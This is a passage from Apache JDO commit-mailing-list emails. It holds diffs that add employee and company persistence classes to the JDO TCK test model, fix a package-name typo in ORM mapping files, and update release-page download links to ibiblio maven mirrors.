// element-type is Employee + + /** This is the JDO-required no-args constructor */ + protected Employee() {} + + /** + * Construct an <code>Employee</code> instance. + * @param personid The identifier for the person. + * @param firstname The first name of the employee. + * @param lastname The last name of the employee. + * @param middlename The middle name of the employee. + * @param birthdate The birth date of the employee. + * @param hiredate The date that the employee was hired. + */ + public Employee(long personid, String firstname, String lastname, + String middlename, Date birthdate, + Date hiredate) { + super(personid, firstname, lastname, middlename, birthdate); + this.hiredate = hiredate; + } + + /** + * Get the date that the employee was hired. + * @return The date the employee was hired. + */ + public Date getHiredate() { + return hiredate; + } + + /** + * Set the date that the employee was hired. + * @param hiredate The date the employee was hired. + */ + public void setHiredate(Date hiredate) { + this.hiredate = hiredate; + } + + /** + * Get the weekly hours of the employee. + * @return The number of hours per week that the employee works. + */ + public double getWeeklyhours() { + return weeklyhours; + } + + /** + * Set the number of hours per week that the employee works. + * @param weeklyhours The number of hours per week that the employee + * works. + */ + public void setWeeklyhours(double weeklyhours) { + this.weeklyhours = weeklyhours; + } + + /** + * Get the employee's department. + * @return The department associated with the employee. + */ + public IDepartment getDepartment() { + return department; + } + + /** + * Set the employee's department. + * @param department The department. + */ + public void setDepartment(IDepartment department) { + this.department = (Department)department; + } + + /** + * Get the employee's funding department. + * @return The funding department associated with the employee. + */ + public IDepartment getFundingDept() { + return fundingDept; + } + + /** + * Set the employee's funding department. + * @param department The funding department. + */ + public void setFundingDept(IDepartment department) { + this.fundingDept = (Department)department; + } + + /** + * Get the employee's manager. + * @return The employee's manager. + */ + public IEmployee getManager() { + return manager; + } + + /** + * Set the employee's manager. + * @param manager The employee's manager. + */ + public void setManager(IEmployee manager) { + this.manager = (Employee)manager; + } + + /** + * Get the employee's team. + * @return The set of <code>Employee</code>s on this employee's team, + * returned as an unmodifiable set. + */ + public Set getTeam() { + return Collections.unmodifiableSet(team); + } + + /** + * Add an <code>Employee</code> to this employee's team. + * This method sets both sides of the relationship, modifying + * this employees team to include parameter emp and modifying + * emp to set its manager attribute to this object. + * @param emp The <code>Employee</code> to add to the team. + */ + public void addToTeam(Employee emp) { + team.add(emp); + emp.manager = this; + } + + /** + * Remove an <code>Employee</code> from this employee's team. + * This method will also set the <code>emp</code> manager to null. + * @param emp The <code>Employee</code> to remove from the team. + */ + public void removeFromTeam(Employee emp) { + team.remove(emp); + emp.manager = null; + } + + /** + * Set the employee's team. + * @param team The set of <code>Employee</code>s. + */ + public void setTeam(Set team) { + // workaround: create a new HashSet, because fostore does not + // support LinkedHashSet + this.team = (team != null) ? new HashSet(team) : null; + } + + /** + * Set the mentor for this employee. + * @param mentor The mentor for this employee. + */ + public void setMentor(IEmployee mentor) { + this.mentor = (Employee)mentor; + } + + /** + * Get the mentor for this employee. + * @return The mentor. + */ + public IEmployee getMentor() { + return mentor; + } + + /** + * Set the protege for this employee. + * @param protege The protege for this employee. + */ + public void setProtege(IEmployee protege) { + this.protege = (Employee)protege; + } + + /** + * Get the protege of this employee. + * @return The protege of this employee. + */ + public IEmployee getProtege() { + return protege; + } + + /** + * Set the HR advisor for this employee. + * @param hradvisor The hradvisor for this employee. + */ + public void setHradvisor(IEmployee hradvisor) { + this.hradvisor = (Employee)hradvisor; + } + + /** + * Get the HR advisor for the employee. + * @return The HR advisor. + */ + public IEmployee getHradvisor() { + return hradvisor; + } + + /** + * Get the HR advisees of this HR advisor. + * @return An unmodifiable <code>Set</code> containing the + * <code>Employee</code>s that are HR advisees of this employee. + */ + public Set getHradvisees() { + return Collections.unmodifiableSet(hradvisees); + } + + /** + * Add an <code>Employee</code> as an advisee of this HR advisor. + * This method also sets the <code>emp</code> hradvisor to reference + * this object. In other words, both sides of the relationship are + * set. + * @param emp The employee to add as an advisee. + */ + public void addAdvisee(Employee emp) { + hradvisees.add(emp); + emp.hradvisor = this; + } + + /** + * Remove an <code>Employee</code> as an advisee of this HR advisor. + * This method also sets the <code>emp</code> hradvisor to null. + * In other words, both sides of the relationship are set. + * @param emp The employee to add as an HR advisee. + */ + public void removeAdvisee(Employee emp) { + hradvisees.remove(emp); + emp.hradvisor = null; + } + + /** + * Set the HR advisees of this HR advisor. + * @param hradvisees The <code>Employee</code>s that are HR advisees of + * this employee. + */ + public void setHradvisees(Set hradvisees) { + // workaround: create a new HashSet, because fostore does not + // support LinkedHashSet + this.hradvisees = (hradvisees != null) ? new HashSet(hradvisees) : null; + } + + /** Serialization support: initialize transient fields. */ + private void readObject(ObjectInputStream in) + throws IOException, ClassNotFoundException { + in.defaultReadObject(); + team = new HashSet(); + hradvisees = new HashSet(); + } + + /** + * Return a String representation of a <code>Employee</code> object. + * @return a String representation of a <code>Employee</code> object. + */ + public String toString() { + return "Employee(" + getFieldRepr() + ")"; + } + + /** + * Returns a String representation of the non-relationship fields. + * @return a String representation of the non-relationship fields. + */ + protected String getFieldRepr() { + StringBuffer rc = new StringBuffer(); + rc.append(super.getFieldRepr()); + rc.append(", hired ").append(formatter.format(hiredate)); + rc.append(", weeklyhours ").append(weeklyhours); + return rc.toString(); + } + + /** + * Returns <code>true</code> if all the fields of this instance are + * deep equal to the corresponding fields of the specified Employee. + * @param other the object with which to compare. + * @param helper EqualityHelper to keep track of instances that have + * already been processed. + * @return <code>true</code> if all the fields are deep equal; + * <code>false</code> otherwise. + * @throws ClassCastException if the specified instances' type prevents + * it from being compared to this instance. + */ + public boolean deepCompareFields(Object other, + EqualityHelper helper) { + IEmployee otherEmp = (IEmployee)other; + String where = "Employee<" + getPersonid() + ">"; + return super.deepCompareFields(otherEmp, helper) & + helper.equals(hiredate, otherEmp.getHiredate(), where + ".hiredate") & + helper.closeEnough(weeklyhours, otherEmp.getWeeklyhours(), where + ".weeklyhours") & + helper.deepEquals(department, otherEmp.getDepartment(), where + ".department") & + helper.deepEquals(fundingDept, otherEmp.getFundingDept(), where + ".fundingDept") & + helper.deepEquals(manager, otherEmp.getManager(), where + ".manager") & + helper.deepEquals(mentor, otherEmp.getMentor(), where + ".mentor") & + helper.deepEquals(protege, otherEmp.getProtege(), where + ".protege") & + helper.deepEquals(hradvisor, otherEmp.getHradvisor(), where + ".hradvisor") & + helper.deepEquals(team, otherEmp.getTeam(), where + ".team") & + helper.deepEquals(hradvisees, otherEmp.getHradvisees(), where + ".hradvisees"); + } + +} + Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/FullTimeEmployee.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/FullTimeEmployee.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/FullTimeEmployee.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/FullTimeEmployee.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,108 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import java.util.Date; + +import org.apache.jdo.tck.util.DeepEquality; +import org.apache.jdo.tck.util.EqualityHelper; + +/** + * This class represents a full-time employee. + */ +public class FullTimeEmployee extends Employee implements IFullTimeEmployee { + + private double salary; + + /** This is the JDO-required no-args constructor. The TCK relies on + * this constructor for testing PersistenceManager.newInstance(PCClass). + */ + public FullTimeEmployee() {} + + /** + * Construct a full-time employee. + * @param personid The person identifier. + * @param first The person's first name. + * @param last The person's last name. + * @param middle The person's middle name. + * @param born The person's birthdate. + * @param hired The date that the person was hired. + * @param sal The salary of the full-time employee. + */ + public FullTimeEmployee(long personid, String first, String last, + String middle, Date born, + Date hired, double sal) { + super(personid, first, last, middle, born, hired); + salary = sal; + } + + /** + * Get the salary of the full time employee. + * @return The salary of the full time employee. + */ + public double getSalary() { + return salary; + } + + /** + * Set the salary for the full-time employee. + * @param salary The salary to set for the full-time employee. + */ + public void setSalary(double salary) { + this.salary = salary; + } + + /** + * Return a String representation of a <code>FullTimeEmployee</code> object. + * @return a String representation of a <code>FullTimeEmployee</code> object. + */ + public String toString() { + return "FullTimeEmployee(" + getFieldRepr() + ")"; + } + + /** + * Returns a String representation of the non-relationship fields. + * @return a String representation of the non-relationship fields. + */ + public String getFieldRepr() { + StringBuffer rc = new StringBuffer(); + rc.append(super.getFieldRepr()); + rc.append(", $").append(salary); + return rc.toString(); + } + + /** + * Returns <code>true</code> if all the fields of this instance are + * deep equal to the coresponding fields of the specified + * FullTimeEmployee. + * @param other the object with which to compare. + * @param helper EqualityHelper to keep track of instances that have + * already been processed. + * @return <code>true</code> if all the fields are deep equal; + * <code>false</code> otherwise. + * @throws ClassCastException if the specified instances' type prevents + * it from being compared to this instance. + */ + public boolean deepCompareFields(Object other, + EqualityHelper helper) { + IFullTimeEmployee otherEmp = (IFullTimeEmployee)other; + String where = "FullTimeEmployee<" + getPersonid() + ">"; + return super.deepCompareFields(otherEmp, helper) & + helper.closeEnough(salary, otherEmp.getSalary(), where + ".salary"); + } + +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/ICompany.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/ICompany.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/ICompany.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/ICompany.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,38 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import java.util.Date; +import java.util.Set; + +/** + * This interface represents the persistent state of Company. + * Javadoc was deliberately omitted because it would distract from + * the purpose of the interface. + */ +public interface ICompany { + + long getCompanyid(); + Set getDepartments(); + Date getFounded(); + String getName(); + + void setCompanyid(long id); + void setDepartments(Set depts); + void setFounded(Date date); + void setName(String string); +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IDepartment.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IDepartment.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IDepartment.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IDepartment.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,37 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import java.util.List; + +/** + * This interface represents the persistent state of Department. + * Javadoc was deliberately omitted because it would distract from + * the purpose of the interface. + */ +public interface IDepartment { + + long getDeptid(); + String getName(); + ICompany getCompany(); + List getEmployees(); + + void setDeptid(long deptid); + void setName(String name); + void setCompany(ICompany company); + void setEmployees(List employees); +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IEmployee.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IEmployee.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IEmployee.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IEmployee.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,51 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import java.util.Date; +import java.util.Set; + +/** + * This interface represents the persistent state of Employee. + * Javadoc was deliberately omitted because it would distract from + * the purpose of the interface. + */ +public interface IEmployee extends IPerson { + + Date getHiredate(); + double getWeeklyhours(); + IDepartment getDepartment(); + IDepartment getFundingDept(); + IEmployee getManager(); + Set getTeam(); + IEmployee getMentor(); + IEmployee getProtege(); + IEmployee getHradvisor(); + Set getHradvisees(); + + void setHiredate(Date hiredate); + void setWeeklyhours(double weeklyhours); + void setDepartment(IDepartment department); + void setFundingDept(IDepartment department); + void setManager(IEmployee manager); + void setTeam(Set team); + void setMentor(IEmployee mentor); + void setProtege(IEmployee protege); + void setHradvisor(IEmployee hradvisor); + void setHradvisees(Set hradvisees); + +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IFullTimeEmployee.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IFullTimeEmployee.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IFullTimeEmployee.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IFullTimeEmployee.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,28 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +/** + * This interface represents the persistent state of FullTimeEmployee. + * Javadoc was deliberately omitted because it would distract from + * the purpose of the interface. + */ +public interface IFullTimeEmployee extends IEmployee { + + double getSalary(); + void setSalary(double salary); +} From [email protected] Wed Sep 20 16:48:24 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54900 invoked from network); 20 Sep 2006 16:48:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Sep 2006 16:48:23 -0000 Received: (qmail 79554 invoked by uid 500); 20 Sep 2006 16:48:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79484 invoked by uid 99); 20 Sep 2006 16:48:16 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Sep 2006 09:48:16 -0700 X-ASF-Spam-Status: No, hits=-9.8 required=5.0 tests=ALL_TRUSTED,NO_REAL_NAME Received: from [161.129.204.104] ([161.129.204.104:55425] helo=eris.apache.org) by idunn.apache.osuosl.org (ecelerity 161.129.204.104 r(12930)) with ESMTP id 63/47-01963-EC071154 for <[email protected]>; Wed, 20 Sep 2006 09:48:14 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id 471811A981D; Wed, 20 Sep 2006 09:48:12 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r448262 - in /db/jdo/trunk/tck20/src/orm: applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm Date: Wed, 20 Sep 2006 16:48:12 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mcaisse Date: Wed Sep 20 09:48:11 2006 New Revision: 448262 URL: http://svn.apache.org/viewvc?view=rev&rev=448262 Log: JDO-420 Fixed typo in package name Modified: db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm Modified: db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm?view=diff&rev=448262&r1=448261&r2=448262 ============================================================================== --- db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm (original) +++ db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm Wed Sep 20 09:48:11 2006 @@ -7,7 +7,7 @@ This file contains the schema information when an implementation has application identity. --> - <package name="org.apache.jdo.tck.pc.companyMapWithoutJoin"> + <package name="org.apache.jdo.tck.pc.companyListWithoutJoin"> <class name="Company" table="companies"> <field name="companyid" column="ID"/> Modified: db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm?view=diff&rev=448262&r1=448261&r2=448262 ============================================================================== --- db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm (original) +++ db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/package-standard10.orm Wed Sep 20 09:48:11 2006 @@ -7,7 +7,7 @@ This file contains the schema information when an implementation has datastore identity. --> - <package name="org.apache.jdo.tck.pc.companyMapWithoutJoin"> + <package name="org.apache.jdo.tck.pc.companyListWithoutJoin"> <class name="Company" table="companies"> <datastore-identity strategy="identity" column="DATASTORE_IDENTITY"/> From [email protected] Sat Sep 23 00:17:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 7919 invoked from network); 23 Sep 2006 00:17:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Sep 2006 00:17:05 -0000 Received: (qmail 18744 invoked by uid 500); 23 Sep 2006 00:17:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18733 invoked by uid 99); 23 Sep 2006 00:17:05 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 22 Sep 2006 17:17:05 -0700 Authentication-Results: idunn.apache.osuosl.org [email protected]; spf=permerror X-ASF-Spam-Status: No, hits=-9.4 required=5.0 tests=ALL_TRUSTED,NO_REAL_NAME Received-SPF: error (idunn.apache.osuosl.org: domain apache.org from 161.129.204.104 cause and error) Received: from [161.129.204.104] ([161.129.204.104:61563] helo=eris.apache.org) by idunn.apache.osuosl.org (ecelerity 161.129.204.104 r(12930)) with ESMTP id CE/C0-25038-FFC74154 for <[email protected]>; Fri, 22 Sep 2006 17:17:03 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id 2A4E41A981A; Fri, 22 Sep 2006 17:17:01 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r449131 - in /db/jdo/site: docs/releases/release-2.0.html xdocs/releases/release-2.0.xml Date: Sat, 23 Sep 2006 00:17:01 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mcaisse Date: Fri Sep 22 17:17:00 2006 New Revision: 449131 URL: http://svn.apache.org/viewvc?view=rev&rev=449131 Log: JDO-406 Modified: db/jdo/site/docs/releases/release-2.0.html db/jdo/site/xdocs/releases/release-2.0.xml Modified: db/jdo/site/docs/releases/release-2.0.html URL: http://svn.apache.org/viewvc/db/jdo/site/docs/releases/release-2.0.html?view=diff&rev=449131&r1=449130&r2=449131 ============================================================================== --- db/jdo/site/docs/releases/release-2.0.html (original) +++ db/jdo/site/docs/releases/release-2.0.html Fri Sep 22 17:17:00 2006 @@ -184,24 +184,14 @@ <tr><td> <blockquote> <p> -<a href="[preferred]/java-repository/javax.jdo/jars/jdo2-api-2.0.jar">jdo2-api-2.0.jar</a> -[<a href="http://www.apache.org/dist/java-repository/javax.jdo/jars/jdo2-api-2.0.jar.asc">PGP</a>] -[<a href="http://www.apache.org/dist/java-repository/javax.jdo/jars/jdo2-api-2.0.jar.md5">MD5</a>] + <a href="http://www.ibiblio.org/maven/javax.jdo/jars/jdo2-api-2.0.jar">jdo2-api-2.0.jar</a> + [<a href="http://www.ibiblio.org/maven/javax.jdo/jars/jdo2-api-2.0.jar.asc">PGP</a>] +[<a href="http://www.ibiblio.org/maven/javax.jdo/jars/jdo2-api-2.0.jar.md5">MD5</a>] </p> <p> -<a href="[preferred]/java-repository/javax.jdo/poms/jdo2-api-2.0.pom">jdo2-api-2.0.pom</a> -[<a href="http://www.apache.org/dist/java-repository/javax.jdo/poms/jdo2-api-2.0.pom.asc">PGP</a>] -[<a href="http://www.apache.org/dist/java-repository/javax.jdo/poms/jdo2-api-2.0.pom.md5">MD5</a>] -</p> - <p> -<a href="[preferred]/db/jdo/2.0/jdo2-api-2.0-src.zip">jdo2-api-2.0-src.zip</a> -[<a href="http://www.apache.org/dist/db/jdo/2.0/jdo2-api-2.0-src.zip.asc">PGP</a>] -[<a href="http://www.apache.org/dist/db/jdo/2.0/jdo2-api-2.0-src.zip.md5">MD5</a>] -</p> - <p> -<a href="[preferred]/db/jdo/2.0/jdo2-api-2.0-src.tar.gz">jdo2-api-2.0-src.tar.gz</a> -[<a href="http://www.apache.org/dist/db/jdo/2.0/jdo2-api-2.0-src.tar.gz.asc">PGP</a>] -[<a href="http://www.apache.org/dist/db/jdo/2.0/jdo2-api-2.0-src.tar.gz.md5">MD5</a>] +<a href="http://www.ibiblio.org/maven/javax.jdo/poms/jdo2-api-2.0.pom">jdo2-api-2.0.pom</a> +[<a href="http://www.ibiblio.org/maven/javax.jdo/poms/jdo2-api-2.0.pom.asc">PGP</a>] +[<a href="http://www.ibiblio.org/maven/javax.jdo/poms/jdo2-api-2.0.pom.md5">MD5</a>] </p> </blockquote> </td></tr> @@ -238,14 +228,14 @@ <tr><td> <blockquote> <p> -<a href="[preferred]/java-repository/org.apache.jdo/jars/jdo2-enhancer-2.0.jar">jdo2-enhancer-2.0.jar</a> -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/jars/jdo2-enhancer-2.0.jar.asc">PGP</a>] -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/jars/jdo2-enhancer-2.0.jar.md5">MD5</a>] + <a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-enhancer-2.0.jar">jdo2-enhancer-2.0.jar</a> + [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-enhancer-2.0.jar.asc">PGP</a>] + [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-enhancer-2.0.jar.md5">MD5</a>] </p> <p> -<a href="[preferred]/java-repository/org.apache.jdo/poms/jdo2-enhancer-2.0.pom">jdo2-enhancer-2.0.pom</a> -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/poms/jdo2-enhancer-2.0.pom.asc">PGP</a>] -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/poms/jdo2-enhancer-2.0.pom.md5">MD5</a>] +<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-enhancer-2.0.pom">jdo2-enhancer-2.0.pom</a> +[<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-enhancer-2.0.pom.asc">PGP</a>] +[<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-enhancer-2.0.pom.md5">MD5</a>] </p> <p> <a href="[preferred]/db/jdo/2.0/jdo2-enhancer-2.0-src.zip">jdo2-enhancer-2.0-src.zip</a> @@ -270,14 +260,14 @@ <tr><td> <blockquote> <p> -<a href="[preferred]/java-repository/org.apache.jdo/jars/jdo2-core-2.0.jar">jdo2-core-2.0.jar</a> -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/jars/jdo2-core-2.0.jar.asc">PGP</a>] -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/jars/jdo2-core-2.0.jar.md5">MD5</a>] + <a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-core-2.0.jar">jdo2-core-2.0.jar</a> + [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-core-2.0.jar.asc">PGP</a>] + [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-core-2.0.jar.md5">MD5</a>] </p> <p> -<a href="[preferred]/java-repository/org.apache.jdo/poms/jdo2-core-2.0.pom">jdo2-core-2.0.pom</a> -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/poms/jdo2-core-2.0.pom.asc">PGP</a>] -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/poms/jdo2-core-2.0.pom.md5">MD5</a>] +<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-core-2.0.pom">jdo2-core-2.0.pom</a> +[<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-core-2.0.pom.asc">PGP</a>] +[<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-core-2.0.pom.md5">MD5</a>] </p> <p> <a href="[preferred]/db/jdo/2.0/jdo2-core-2.0-src.zip">jdo2-core-2.0-src.zip</a> Modified: db/jdo/site/xdocs/releases/release-2.0.xml URL: http://svn.apache.org/viewvc/db/jdo/site/xdocs/releases/release-2.0.xml?view=diff&rev=449131&r1=449130&r2=449131 ============================================================================== --- db/jdo/site/xdocs/releases/release-2.0.xml (original) +++ db/jdo/site/xdocs/releases/release-2.0.xml Fri Sep 22 17:17:00 2006 @@ -43,15 +43,16 @@ </subsection> <subsection name="API"> <p> -<a href="[preferred]/java-repository/javax.jdo/jars/jdo2-api-2.0.jar">jdo2-api-2.0.jar</a> -[<a href="http://www.apache.org/dist/java-repository/javax.jdo/jars/jdo2-api-2.0.jar.asc">PGP</a>] -[<a href="http://www.apache.org/dist/java-repository/javax.jdo/jars/jdo2-api-2.0.jar.md5">MD5</a>] + <a href="http://www.ibiblio.org/maven/javax.jdo/jars/jdo2-api-2.0.jar">jdo2-api-2.0.jar</a> + [<a href="http://www.ibiblio.org/maven/javax.jdo/jars/jdo2-api-2.0.jar.asc">PGP</a>] +[<a href="http://www.ibiblio.org/maven/javax.jdo/jars/jdo2-api-2.0.jar.md5">MD5</a>] </p> <p> -<a href="[preferred]/java-repository/javax.jdo/poms/jdo2-api-2.0.pom">jdo2-api-2.0.pom</a> -[<a href="http://www.apache.org/dist/java-repository/javax.jdo/poms/jdo2-api-2.0.pom.asc">PGP</a>] -[<a href="http://www.apache.org/dist/java-repository/javax.jdo/poms/jdo2-api-2.0.pom.md5">MD5</a>] +<a href="http://www.ibiblio.org/maven/javax.jdo/poms/jdo2-api-2.0.pom">jdo2-api-2.0.pom</a> +[<a href="http://www.ibiblio.org/maven/javax.jdo/poms/jdo2-api-2.0.pom.asc">PGP</a>] +[<a href="http://www.ibiblio.org/maven/javax.jdo/poms/jdo2-api-2.0.pom.md5">MD5</a>] </p> +<!-- api src not available?? <p> <a href="[preferred]/db/jdo/2.0/jdo2-api-2.0-src.zip">jdo2-api-2.0-src.zip</a> [<a href="http://www.apache.org/dist/db/jdo/2.0/jdo2-api-2.0-src.zip.asc">PGP</a>] @@ -62,6 +63,7 @@ [<a href="http://www.apache.org/dist/db/jdo/2.0/jdo2-api-2.0-src.tar.gz.asc">PGP</a>] [<a href="http://www.apache.org/dist/db/jdo/2.0/jdo2-api-2.0-src.tar.gz.md5">MD5</a>] </p> +--> </subsection> <subsection name="TCK"> @@ -79,14 +81,14 